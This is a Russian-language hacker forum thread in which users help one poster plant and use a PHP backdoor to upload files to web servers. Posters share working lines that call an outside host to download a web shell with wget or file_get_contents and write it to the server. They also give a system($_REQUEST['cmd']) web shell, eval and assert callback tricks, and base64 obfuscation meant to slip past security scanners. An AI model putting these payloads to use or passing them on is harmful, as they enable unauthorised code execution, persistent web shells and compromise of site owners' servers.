PDA

Просмотр полной версии : Бэкдор php - загрузка файла


skaska
25.07.2015, 09:11
тестирую на своем сервере, на site.ru/ в файл, index.php (или в любой др файл читаемый в браузере) прописываю это бэкдор:





не ругайте сильно - учусь... что мне нужно ввести в адресной строке, чтоб загрузить файл на сервер? вариант без использования куков, т е простой вариант есть? знаю, нужно исполнить команду: можно через eval,

типа site.ru/index.php?f=eval.......????

подскажите что ввести в адресной строке для загрузки файла на сервер именно для этого бэкдора, буду каждому благодарен!

grimnir
25.07.2015, 11:06
.php?param1=eval&param2=wget http://site.com/wso.txt -O shell.php

как-то так,возможно вместо eval надо будет писать exec,system и т.д ,использовать кодирование,вместо wget curl

b3
25.07.2015, 12:19
Код можно очень сильно сократить

skaska
25.07.2015, 12:21
команда рабочая, спасибо... но работает не всегда, из 5 серверов на один загрузило удачно! на остальные выдает это


Warning: array_filter() expects parameter 2 to be a valid callback, function 'eval' not found or invalid function name in /var/www/u2847619/data/www/adgstroy.ru/index.php on line 3
OK

иногда пишет ОК, по факту на серваке пусто.

права нужные (в загружаемой категории уже лежит рабочий шелл), вариации перебрал exec,system и вместо wget curl... в чем может быть загвоздка?

skaska
25.07.2015, 12:24
↑ (https://antichat.live/posts/3872525/)
Код можно очень сильно сократить


да можно знаю, иногда получается с таким вариантом:


http://site.ru/cashe.php?cmd=$url = "http://ышеу2.ru/data/shell.txt";$content = file_get_contents($url);$h = fopen("shell.php","w");$text = "$content";fwrite($h,$text);fclose($h);

опять же в меньше половины случаев(

b3
25.07.2015, 12:30
Я имел другое ввиду, ваш код из первого поста можно сократить значительно, а использование eval прям в коде это паливо жестокое

faza02
25.07.2015, 12:43
wget это системная функция, eval-то при чем?

b3
25.07.2015, 12:49
Warning: array_filter() expects parameter 2 to be a valid callback, function 'eval' not found or invalid function name


Наверное потому что eval не явлется функцией, а там хз не буду утверждать 100%

koro
25.07.2015, 12:51
if(isset($_REQUEST['cmd'])){
$cmd= ($_REQUEST["cmd"]);

echo"";
system($cmd);
echo"";
die;
}

b3
25.07.2015, 12:57
еще один хакер... давайте глупости писать не будем может?

koro
25.07.2015, 13:01
↑ (https://antichat.live/posts/3872549/)
еще один хакер... давайте глупости писать не будем может?


а нафига велосипед изобретать

koro
25.07.2015, 13:05
include("data:text/plain;base64,base64_encode($_GET['c'])");

b3
25.07.2015, 13:32
↑ (https://antichat.live/posts/3872551/)
а нафига велосипед изобретать


Может велосипед нужен для того чтоб обойти сканеры безопасности?

skaska
25.07.2015, 18:09
поклон всем за ответы... опытным путем выявил, что самым рабочим вариантов является этот




но он и самый палевый! вопрос, можно ли его абфусцировать с сохранением работоспособности, если да - меняется ли кодировка запроса?

сейчас запрос таков:


http://site.ru/index.php?cmd=$url = "http://site2.ru/text.txt";$content = file_get_contents($url);$h = fopen("text.php","w");$text = "$content";fwrite($h,$text);fclose($h);

grimnir
25.07.2015, 18:15
↑ (https://antichat.live/posts/3872636/)
поклон всем за ответы... опытным путем выявил, что самым рабочим вариантов является этот



но он и самый палевый! вопрос, можно ли его абфусцировать с сохранением работоспособности, если да - меняется ли кодировка запроса?
сейчас запрос таков:

http://site.ru/index.php?cmd=$url = "http://site2.ru/text.txt";$content = file_get_contents($url);$h = fopen("text.php","w");$text = "$content";fwrite($h,$text);fclose($h);





http://site.ru/index.php?cmd=base64_decode('JHVybCA9ICJodHRwOi8vc 2l0ZTIucnUvdGV4dC50eHQiOyRjb250ZW50ID0gZmlsZV9nZXR fY29udGVudHMoJHVybCk7JGg9Zm9wZW4oInRleHQucGhwIiwid yIpOyR0ZXh0ID0gIiRjb250ZW50Ijtmd3JpdGUoJGgsJHRleHQ pO2ZjbG9zZSgkaCk7');

Кодировать тут http://securityxploded.com/online-base64-encoder.php

Еще вот посмотри

http://habrahabr.ru/post/215139

http://habrahabr.ru/post/215817/

skaska
25.07.2015, 19:42
↑ (https://antichat.live/posts/3872637/)

http://site.ru/index.php?cmd=base64_decode('JHVybCA9ICJodHRwOi8vc 2l0ZTIucnUvdGV4dC50eHQiOyRjb250ZW50ID0gZmlsZV9nZXR fY29udGVudHMoJHVybCk7JGg9Zm9wZW4oInRleHQucGhwIiwid yIpOyR0ZXh0ID0gIiRjb250ZW50Ijtmd3JpdGUoJGgsJHRleHQ pO2ZjbG9zZSgkaCk7');

Кодировать тут
http://securityxploded.com/online-base64-encoder.php
Еще вот посмотри
http://habrahabr.ru/post/215139
http://habrahabr.ru/post/215817/


спасибо за ссылки, ответ на свой вопрос там не нашел... в соседней ветки нашел что можно абфуцировать так




но зачем он это сделал я не понял, ведь функция eval как говориться наружу бархатом осталась.. смысл было это делать..

интересует конкретно вопрос: можно ли обфусцировать всю строку без потери работоспособности и меняется ли при этом кодировка в запросе?

Ch3ck
25.07.2015, 20:01
Б3, запости им свой зиродей

skaska
25.07.2015, 20:17
разобрался ребята, за назойливость прошу простить

для меня лучший варик это:



file.php?f=assert&c=phpinfo();
file.php?f=eval&c=echo 1;

проверил работает! дальше больше...

и еще, eval часто не срабатывает - заменяем на exec или system и радуемся. Выше хороший человек подсказал: спасибо ему второй раз!

b3
25.07.2015, 21:25
eval работает всегда а вот как раз таки system часто отключен, уверен на 100% передаешь в eval невалидный код вот и облом

VY_CMa
26.07.2015, 00:30

traceme
28.07.2015, 20:54
Вставляю этот скрипт для аплоада при использовании eval($_GET[cmd]);


Done ==> $userfile_name";
}
}
else
{
echo'
';
}
?>

hAv3n1c3DaY
29.07.2015, 01:01
tmpqhtwe.php //название этого скрипта